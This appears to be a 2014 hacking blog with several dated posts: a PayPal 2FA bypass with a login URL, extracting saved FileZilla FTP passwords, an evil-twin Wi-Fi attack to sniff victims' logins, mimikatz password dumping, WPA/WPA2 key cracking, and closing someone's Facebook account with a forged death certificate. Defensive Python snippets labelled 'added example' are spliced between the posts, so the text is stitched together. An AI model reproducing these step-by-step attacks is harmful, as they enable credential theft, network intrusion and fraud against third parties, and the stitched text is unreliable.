Wednesday, August 6, 2014 4:40 AM

Paypal Complete 2-Factor Authentication (2FA) Bypass Exploit

To make it clear: The Paypal account you were 'hacking' did NOT have to be affiliated with the eBay account you were using. In my original tests, I had made a new eBay account using a temporary email, and had gotten into my Paypal through the same method.

Found by Joshua Rogers

It works even without an eBay account, actually.

https://www.paypal.com/cgi-bin/webscr?cmd=_integrated-registration&key=0&stamp=1364194631&data=JGHnP2g2ybqbgKfR7%2B1loOlg24LvI/VppQIqFE8DyTO9hqc1x1pQw42CCLy3EdEogm85LYOTKtU2wYNfjFZvuHSx4PjAHLVtlv6sYdPl2FIBLN7BNr3l%2BPe0WPeDhopUWqhw0PYE9EAyZPkgIZWJgWKGGGNPqdQRjlbNGoCCIox7RLfKmtEDeH8KXEOzZDSmvETO%2B7fkoy06CLe9CkJhE0V8Mh9QN/wNYIF6WMFgHsze7RAS8Qe3j/U9I9zYXDPcfB2L5AVCYI53jcWUOxeKXSlcoV0eIcxkLOkLfmSqnaY9vywEQEhEU2PYoKSqefaZBPFh6Y7kWXVD/7id8PvkrJzKaCUq0nhBRfFGtf1kYrK0ZgX%2Byws4HmiTn4GEL/gaUPtpWviP4BCJmeGOhzQEhbFNYwzuzmOWAaqYfsa62DsAcq3LUy1DyAmBfsLhwzRyzZhKlg1NRz5MxTsuBqlh72W6ytc1gEMwh%2BJtBxZTf7EggIaTRLdpjXMlZmwRjkMH2BjX8P4968XicykzmLhTpqpg507flV%2Belq3QNBd9cAliSskS3n/%2Bd1os7FQBnogr4tZ7srcTkoPM5nezXqz3caE/loqoJnkWvlRYfNJpSSysjQ%2BThTgiwNtk4eh8X2r3LhepLD27KdM7I299%2BnWVF9veVjw625ZT%2B3MyQMiO7FbMJdng5baW%2BZIRFIear2GlEJVXMlftP3ibMJAmzGrnKqB0sPwY3augnaBNnz4u32QAaxg8zhvz5FEaELdpFxJ4ptLdRc2MFUBFkUDm%2B5tlpuNl9JzgKTDQnXzYxX/2KYAznivHTlsCcwH68kL6EqoiGGTsFoLzp8TqnLvizULu6tdfnTAhhxV6kCeRRoyN/a62wahvxDibJgTnTjp4d3/xm4nhkQhQ5/xUgtAN9T1aa7n5PinOWS84AOFR0TB3KpwHsQkoQCGXvzdYZh4wD8ECQzYS9lbpaCLm13GqPGK4xC6K2vat8/gt9uoiJbiy77SK2PcMhcRS3KbK9Z0HtDCl&ev=1.0&locale=en_US
 
On the 5th of June, 2014, I found a complete bypass of Paypal's 2FA, in which anybody would be able to access a Paypal account that has 2FA set up, simply by logging in through a "special" Paypal page.

eBay, in conjunction with Paypal, provides a service where you can link your eBay account to your Paypal account, so that when you sell something on eBay, the fees automatically come out of your Paypal account.

When setting this up, you're (obviously) asked for your Paypal login.

When you are redirected to the login page (above), the URL contains "=_integrated-registration". A quick Google search for this shows that it isn't used for anything other than eBay; thus it is set up purely for Paypal and eBay.

Once you're actually logged in, a cookie is set with your details, and you're redirected to a page to confirm the details of the process. This is where the exploit lies. Now just load http://www.paypal.com/ and you are logged in, without needing to re-enter your login.

So, the actual bug itself is that the "=_integrated-registration" function does not check for a 2FA code, despite logging you into Paypal.

You could repeat the process using the same "=_integrated-registration" page an unlimited number of times.
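The bug above is an instance of a login path that never consults the account's 2FA policy. As an added example (not Paypal's code), here is that pattern modelled in Python with constructed accounts, next to the fix of routing every entry point through one session-issuing chokepoint; the account records, the password hash and the one-time-code check are stand-ins for the demo.

```python
"""Added example, not Paypal's code: an alternate login page that mints a full session
without checking 2FA, and the fix of a single chokepoint every login path must use.
Accounts, the hash and the OTP check are constructed stand-ins (the OTP is an HMAC
over a fixed label, not real TOTP)."""
from dataclasses import dataclass
from typing import Optional
import hashlib
import hmac
import secrets


@dataclass
class Account:
    username: str
    salt: bytes
    password_hash: bytes
    twofa_enabled: bool
    twofa_secret: bytes = b""


@dataclass
class AuthResult:
    session_cookie: Optional[str]   # None means no session was issued
    reason: str


def make_account(username, password, twofa_secret=None):
    salt = secrets.token_bytes(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return Account(username, salt, pw_hash, twofa_secret is not None, twofa_secret or b"")


def password_ok(acct, password):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), acct.salt, 100_000)
    return hmac.compare_digest(candidate, acct.password_hash)


def demo_otp(acct):
    """Constructed stand-in for the code a 2FA device would show (fixed label, not time-based)."""
    return hmac.new(acct.twofa_secret, b"demo-window", hashlib.sha256).hexdigest()[:6]


def otp_ok(acct, otp):
    return otp is not None and hmac.compare_digest(demo_otp(acct), otp)


# --- vulnerable: a second login entry point with its own, weaker policy -----------
def login_integrated_registration_vulnerable(acct, password):
    # BUG: the partner-linking flow validates the password and sets the session
    # cookie itself; the account's 2FA flag is never consulted.
    if not password_ok(acct, password):
        return AuthResult(None, "bad password")
    return AuthResult(secrets.token_hex(16), "ok (2FA never checked)")


# --- fixed: every entry point asks one function for a session ---------------------
def issue_session(acct, password_valid, otp_valid):
    """The single place sessions are minted; 2FA policy lives here and only here."""
    if not password_valid:
        return AuthResult(None, "bad password")
    if acct.twofa_enabled and not otp_valid:
        return AuthResult(None, "2FA code required")
    return AuthResult(secrets.token_hex(16), "ok")


def login_main(acct, password, otp=None):
    return issue_session(acct, password_ok(acct, password), otp_ok(acct, otp))


def login_integrated_registration(acct, password, otp=None):
    # Same chokepoint as the main login page, so the linking flow cannot skip 2FA.
    return issue_session(acct, password_ok(acct, password), otp_ok(acct, otp))
```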

I originally found this on the 5th of June, 2014, and reported it to Paypal the same day.

I have also uploaded a demonstration of it on YouTube.

It still works.


For the complete tutorial, contact me on Facebook or Twitter:
https://www.facebook.com/zxera
https://www.twitter.com/Yedens

For educational purposes only

Monday, July 14, 2014 3:37 AM

How to Crack FTP Passwords from FileZilla?

Wondering how to crack an FTP password from FileZilla, when it is just an application for connecting to an FTP server? Well guys, this is not a hack. It is simply a trick that lets you grab a bunch of passwords for FTP servers that were connected to from FileZilla.

Beware: FileZilla doesn't protect your password.
It simply saves your password as XML data in your user's Roaming directory.

In this tutorial we will go through how to extract saved passwords from FileZilla, so without wasting time let's start the step-by-step tutorial.

Step 1:

Go to your desktop. Here I'm using the Desktop tab in Favorites; now go to Users (system folder).
Step 2:

Before going further, let's unhide (show hidden items) everything, as it will help us in the later steps.
To do this, go to View at the top of Explorer and make sure "Hidden items" is checked.

Step 3:

Now you're ready to go further. If you've done step 2 properly you should see the AppData directory. Now go to AppData and open the Roaming directory.


Step 4:

Now you should see a FileZilla folder inside the Roaming directory.
Open FileZilla.

Now you should see some XML files (filezilla.xml, filters.xml, queue.xml and others).
Right-click on recentservers.xml and choose "Edit with Notepad++" or simply "Edit" from the drop-down menu.

Step 5:

Now voila, you've successfully cracked the FTP password :D

Conclusion

Never leave your history. Always clear your history after using FileZilla to protect your password. In 2009 many servers were hacked by FileZilla-targeting malware; by default FileZilla doesn't protect your password.

Hope you've enjoyed the tutorial.
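Clearing the stored passwords is the defence the conclusion above asks for. As an added example (not part of this tutorial), here is a Python script that audits the FileZilla XML files for stored <Pass> elements and scrubs them while keeping the server entries; the sample XML is constructed in the shape recentservers.xml uses, and the %APPDATA%\FileZilla paths are the defaults named in the tutorial.

```python
"""Added example, not from the tutorial: report which FileZilla server entries carry a
stored password, and strip the <Pass> elements. SAMPLE_RECENTSERVERS is constructed
in the layout of FileZilla 3's recentservers.xml / sitemanager.xml."""
import os
import xml.etree.ElementTree as ET

SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3>
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>alice</User>
      <Pass>s3cret-in-clear</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>bob</User>
      <Logontype>2</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def stored_credentials(xml_text):
    """Return (host, user, password_present) per <Server>; the secret itself is never returned."""
    root = ET.fromstring(xml_text)
    report = []
    for server in root.iter("Server"):
        host = server.findtext("Host", "")
        user = server.findtext("User", "")
        report.append((host, user, server.find("Pass") is not None))
    return report


def scrub_passwords(xml_text):
    """Remove every <Pass> element; returns (cleaned_xml, number_removed)."""
    root = ET.fromstring(xml_text)
    removed = 0
    for server in root.iter("Server"):
        for pw in server.findall("Pass"):
            server.remove(pw)
            removed += 1
    return ET.tostring(root, encoding="unicode"), removed


def scrub_file(path):
    """Scrub a real FileZilla XML file in place; returns how many passwords were removed."""
    with open(path, encoding="utf-8") as f:
        cleaned, removed = scrub_passwords(f.read())
    if removed:
        with open(path, "w", encoding="utf-8") as f:
            f.write('<?xml version="1.0" encoding="UTF-8"?>\n' + cleaned)
    return removed


def default_paths():
    """The two files FileZilla keeps under %APPDATA%\\FileZilla on Windows."""
    base = os.path.join(os.environ.get("APPDATA", ""), "FileZilla")
    return [os.path.join(base, name) for name in ("recentservers.xml", "sitemanager.xml")]


if __name__ == "__main__":
    for host, user, has_pw in stored_credentials(SAMPLE_RECENTSERVERS):
        print(f"{host:20} {user:10} stored password: {has_pw}")
    for path in default_paths():
        if os.path.exists(path):
            print(path, "passwords removed:", scrub_file(path))
```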

Sunday, June 22, 2014 5:23 PM

A Beginners Guide to Ethical Hacking - E-BOOK

A Beginners Guide to Ethical Hacking is a complete path for newbie hackers who are curious to learn ethical hacking techniques. The information given in this book will make you a master hacker.

How will the information in the book affect me?

  • You will learn all ethical hacking techniques and also learn to apply them in real-world situations
  • You will start to think like a hacker
  • Secure your computer from trojans, worms, adware etc.
  • Amaze your friends with your newly learned tricks
  • You will be able to protect yourself from future hack attacks

Download it for free


Wifi Packet Capturing and Session Hijacking using Wireshark 2

Before you go through this section you need to read the first tutorial:
Wifi Packet Capturing and Session Hijacking using Wireshark 1

Step 7

Now set up the new configuration by typing these commands:
“ifconfig eth0 0.0.0.0 up”
“ifconfig at0 0.0.0.0 up”

Description:
ifconfig stands for interface configurator. The ifconfig command is used to configure network interfaces; it is widely used to initialize a network interface and to enable or disable interfaces.

Step 8

Now turn on the MITM interface by typing this command:
“ifconfig mitm up”

Description:
ifconfig stands for interface configurator. The ifconfig command is used to configure network interfaces; it is widely used to initialize a network interface and to enable or disable interfaces.
By default the interface we created is down, so we need to bring it up.

Step 9

Now send the deauthentication packets to the router by typing this command:
“aireplay-ng --deauth 0 -a 94:44:52:DA:B4:28 mon0”

Description:
aireplay-ng is used to inject frames.
Its primary function is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications, interactive packet replay, hand-crafted ARP request injection and ARP-request reinjection.
We use 0 for continuous flooding of packets; 1 sends a single deauthentication.
-a is the BSSID of the victim network; 94:44:52:DA:B4:28 here is the BSSID of the victim network.

Step 10

Now it's time to assign IP addresses to all the victims by typing this command:
“dhclient3 mitm &”

Description:
Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of numbers (a scope) configured for a given network.

Step 11

Now you can check the clients connected on the 5th terminal, where you created the fake access point.

Step 12

Start the Wireshark packet analyzer tool by typing this command:
“wireshark &”

Description:
Wireshark is an open source tool for profiling network traffic and analyzing packets. Such a tool is often referred to as a network analyzer, network protocol analyzer or sniffer.

Step 13

Now select the interface (at0) and click on START.

Type “http contains POST” as the filter and you will see all the matching packets in your sniffing tool,

and you'll get the user name and password :)
Happy hacking


Wifi Packet Capturing and Session Hijacking using Wireshark 1



The main objective of this attack is to make a fake access point and send fake ARP packets on the same Wi-Fi network the users are connected to, with the fake access point's name identical to the name of the wireless network already there. When a fake access point with the same network name is created, a user connected to the original network gets disconnected and connects to your fake access point, so all their traffic tunnels through my system and we get all the details/credentials/information of that user, which is generally known as session hijacking.

 

Requirements

1. Backtrack Operating System (BT5)
2. Virtual Machine (With USB Adapter)
3. Internet Access on your System 

Step 1

Open the Backtrack operating system, start a terminal and type “iwconfig” to check the wireless interface.

Description:
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces. It is used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency).

Step - 2

Start this wireless interface by typing this command:
“airmon-ng start wlan0”

Description:
This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters shows the interface status.
wlan0 is your wifi card: wlan is wireless LAN and 0 is the number of your card.

Step - 3

Start capturing in monitor mode by typing this command: “airodump-ng mon0”. It captures data from all stations.

Description:
Airodump-ng is used for packet capture of raw 802.11 frames and is particularly suitable for collecting WEP IVs (initialization vectors) for the purpose of using them with aircrack-ng. Airodump-ng is also capable of logging the coordinates of the found access points.
mon0 is the same card (wlan0) in monitor mode. Once you put wlan0 in monitor mode it will be listed as both mon0 and wlan0.

Step 4

Set the channel ID shown above in the airodump-ng output by typing these commands (in either order):
“iwconfig mon0 channel 5”
“iwconfig wlan0 channel 5”

Description:
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces. It is used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency).
wlan0 is your wifi card: wlan is wireless LAN and 0 is the number of your card.
mon0 is the same card (wlan0) in monitor mode. Once you put wlan0 in monitor mode it will be listed as both mon0 and wlan0.
The “--channel” (-c) option allows a single or specific channels to be selected.

Step 5

Now set up your fake router by typing this command:
“airbase-ng -e "belkin.3448" mon0”

Description:
Airbase-ng is a multi-purpose tool aimed at attacking clients as opposed to the access point (AP) itself. The main idea of the implementation is that it should encourage clients to associate with the fake AP, not prevent them from accessing the real AP.
“--essid” (-e) sets the ESSID (name) of the network.

Step 6

Now it's time to bridge the networks by typing these commands:
“brctl addbr mitm”
“brctl addif mitm eth0”
“brctl addif mitm at0”
Here mitm is the <interface name> of the bridge.

Description:
brctl is used to create a bridge between two interfaces.
addbr: a bridge can be added using this command, with <name> being the name of the bridge being created.
addif: adds an interface to a bridge, where <brname> is the existing bridge name and <ifname> is the interface you want to add.

Wednesday, June 11, 2014 7:39 AM

Far Cry 4 World Gameplay (Nepal) Premiere- Walkthrough E3 2014
Watch the first Far Cry 4 game play footage, introducing the #1 most requested feature among fans: open-world co-op with a friend!


Included Environment Concept of Nepal and Bhutan

About Far Cry 4
Far Cry 4 delivers a massive new open world for you to explore and survive. Hidden in the towering Himalayas lies Kyrat, a country steeped in tradition and violence. You are Ajay Ghale. Traveling to Kyrat to fulfill your mother's dying wish, you find yourself caught up in a civil war to overthrow the oppressive regime of dictator Pagan Min. Explore and navigate this vast open world, where danger and unpredictability lurk around every corner. Here, every decision counts, and every second is a story.

Tuesday, June 10, 2014 12:11 AM

Hack Windows password in no time

So you were looking for a Windows 8 password hacking tool and never found any interesting post, right?

Now here I'm back with a 100% working Windows 8 password hacking tutorial.

So what are you waiting for? Start downloading the tool and proceed step by step.

Step 1

Download Tool [click here]
Now extract the downloaded tools wherever you want.

Step 2

Open the appropriate folder, x64 or win32, for your operating system.

Step 3

Run mimikatz as Administrator.
On the firewall notification select "Yes".

Step 4

Now this screen will be displayed:

Step 5

To check whether the privilege is granted, enter the command below:
privilege::debug
You should get a result like the image below.

Step 6

If you get the privilege as in the image above, you are ready to get the password.
Now enter the command below to get the password:
sekurlsa::logonPasswords full
(there is a space after "logonPasswords")

Hope you've enjoyed this tutorial :) please comment your feedback

Friday, June 6, 2014 4:24 AM

Close Facebook Accounts

What this guide will show you, is how to get any facebook account closed. You will do this by tricking facebook into thinking the person is dead, so they will close the account.

This simple tutorial will help you to close your friends, family or anyone's facebook account if he/she is no more in this world. All the best (y)
  1. Goto
  1. Full Name: Your Victims Full name(Name last name)
    Date of birth: Go at his profile and click at Info tab and get his date of birth.
    Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
    Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
    Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
    Relationship to this person: To make more believable select Immediate Family.
    Requested Action: Remove Profile
    Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a Death Certificate or Certificate of a Death. Open up the image in photoshop and fill in the blanks. Save your image to desktop and upload it in one of the Image
    Free Hosting like: http://imageshack.us
    Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.
  2. Click on Submit and then a message will appear:
    Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the time.

Sunday, June 1, 2014 7:48 AM

Vulnerabilities in 'All in One SEO Pack' Wordpress Plugin Put Millions of Sites At Risk

Multiple serious vulnerabilities have been discovered in the widely used ‘All In One SEO Pack’ plugin for WordPress, putting millions of WordPress websites at risk.

WordPress is easy to set up and use, which is why a large number of people like it. But if you or your company use the ‘All in One SEO Pack’ WordPress plugin to optimize your website's ranking in search engines, you should update the plugin immediately to the latest version, All in One SEO Pack 2.1.6.

Today, the All in One SEO Pack plugin team released an emergency security update that patches two critical privilege escalation vulnerabilities and one cross-site scripting (XSS) flaw, discovered by security researchers at Sucuri, a web monitoring and malware clean-up service.

More than 73 million websites on the Internet run on the WordPress publishing platform, and more than 15 million of them currently use the All in One SEO Pack plugin for search engine optimization.

According to Sucuri, the reported privilege escalation vulnerabilities allow an attacker to add and modify the WordPress website's meta information, which could harm its search engine ranking.

"In the first case, a logged-in user, without possessing any kind of administrative privileges (like an author or subscriber), could add or modify certain parameters used by the plugin. It includes the post's SEO title, description and keyword meta tags," Sucuri said.

Also, the reported cross-site scripting vulnerability can be exploited by malicious hackers to execute malicious JavaScript code in an administrator's control panel. "This means that an attacker could potentially inject any JavaScript code and do things like changing the admin's account password to leaving some backdoor in your website's files in order to conduct even more 'evil' activities later," the Sucuri blog post said.

Vulnerabilities in WordPress plugins are the root cause of the majority of WordPress exploitation and one of the main tools in web attackers' arsenal. Plugin vulnerabilities can be exploited to access sensitive information, deface websites, redirect visitors to malicious sites, or perform DDoS attacks.

So far, no attacks exploiting these vulnerabilities have been seen in the wild, but WordPress website owners are advised to update their All in One SEO Pack plugin to the latest version immediately.

Thursday, May 29, 2014 12:58 AM

Tutorial 3: How to Crack WPA/WPA2


Step 2 - Start airodump-ng to collect authentication handshake

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.

Enter:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Where:
-c 9 is the channel for the wireless network
--bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
-w psk is the file name prefix for the file which will contain the IVs.
ath0 is the interface name.

Important: Do NOT use the "--ivs" option. You must capture the full packets.

Here is what it looks like if a wireless client is connected to the network:

CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy

BSSID              STATION            PWR  Lost  Packets  Probes

00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116

In the screen above, notice the "WPA handshake: 00:14:6C:7E:40:80" in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:

CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy

BSSID              STATION            PWR  Lost  Packets  Probes

Troubleshooting Tip
See the Troubleshooting Tips section below for ideas.

To see if you captured any handshake packets, there are two ways. Watch the airodump-ng screen for " WPA handshake: 00:14:6C:7E:40:80" in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.

Use Wireshark and apply a filter of "eapol". This displays only the EAPOL packets you are interested in. Thus you can see whether the capture contains 0, 1, 2, 3 or 4 EAPOL packets.



Step 3 - Use aireplay-ng to deauthenticate the wireless client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Where:
-0 means deauthentication
1 is the number of deauths to send (you can send multiple if you wish)
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
ath0 is the interface name

Here is what the output looks like:

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

With luck this causes the client to reauthenticate and yield the 4-way handshake.


Troubleshooting Tips

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not "hear" the deauthentication packet.


Step 4 - Run aircrack-ng to crack the pre-shared key

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.

There is a small dictionary that comes with aircrack-ng - "password.lst". This file can be found in the "test" directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper (JTR) to generate your own list and pipe them into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.

Open another console session and enter:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Where:
-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
psk*.cap is the name of the group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Here is typical output when there are no handshakes found:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

No valid WPA handshakes found.

When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP.

Here is typical output when handshakes are found:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

   #  BSSID              ESSID                     Encryption

   1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)

Choosing first network as target.

Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.

Here is what successfully cracking the pre-shared key looks like:

Aircrack-ng 0.8

[00:00:00] 2 keys tested (37.20 k/s)

KEY FOUND! [ 12345678 ]

Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
                 B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
                 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
                 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
                 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
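What Step 4 does for every dictionary word is a fixed, standardised computation, and it is worth seeing from the defender's side: the "Master Key" aircrack-ng prints is the Pairwise Master Key, PBKDF2-HMAC-SHA1 of the passphrase salted with the SSID at 4096 iterations, so the cost per guess is the same for every network and only the passphrase's entropy decides how long a run takes. The following Python is an added example, not part of the aircrack-ng tutorial; the wordlist is constructed, and the PMK comparison stands in for the EAPOL MIC check a real run performs against the captured handshake.

```python
"""Added example, not from the aircrack-ng tutorial: the per-candidate PMK derivation
behind Step 4. PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
The wordlist is constructed; comparing PMKs stands in for the handshake MIC check."""
import hashlib
import time

PBKDF2_ITERATIONS = 4096   # fixed by the 802.11i standard for WPA/WPA2-PSK
PMK_LEN = 32               # bytes; aircrack-ng prints this value as the "Master Key"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, dklen=32)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def pmk_hex(passphrase: str, ssid: str) -> str:
    """Same layout as aircrack-ng's Master Key line: space-separated upper-case bytes."""
    return " ".join(f"{b:02X}" for b in derive_pmk(passphrase, ssid))


def dictionary_search(ssid, target_pmk, candidates):
    """Derive each candidate's PMK and compare it with the target. In a real run the
    comparison goes through the EAPOL MIC (which needs the handshake nonces);
    here the PMK itself is the oracle. Returns (match or None, candidates tested)."""
    tested = 0
    for word in candidates:
        tested += 1
        if derive_pmk(word, ssid) == target_pmk:
            return word, tested
    return None, tested


def keys_per_second(ssid="teddy", sample=50):
    """Rough single-core rate of this Python loop, comparable to aircrack-ng's k/s figure."""
    start = time.perf_counter()
    for i in range(sample):
        derive_pmk(f"candidate{i:04d}", ssid)
    return sample / (time.perf_counter() - start)


def exhaust_seconds(keyspace_size, rate):
    """Worst-case time to try every passphrase in a keyspace at `rate` keys per second."""
    return keyspace_size / rate


if __name__ == "__main__":
    # Constructed wordlist; the tutorial's key sits near the end on purpose.
    wordlist = ["password", "letmein", "qwerty", "12345678", "welcome1"]
    target = derive_pmk("12345678", "teddy")
    print("PMK for ESSID teddy:", pmk_hex("12345678", "teddy"))
    print("search result:", dictionary_search("teddy", target, wordlist))
    print(f"this machine: {keys_per_second():.0f} keys/s")
    # Every 8-digit numeric PSK at the tutorial's 37.20 k/s: 10**8 / 37200 s, about 45 minutes.
    print(f"all 8-digit PINs at 37.20 k/s: {exhaust_seconds(10**8, 37_200) / 60:.0f} minutes")
```

pmk_hex("12345678", "teddy") is the value to compare against the Master Key line in the output above.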



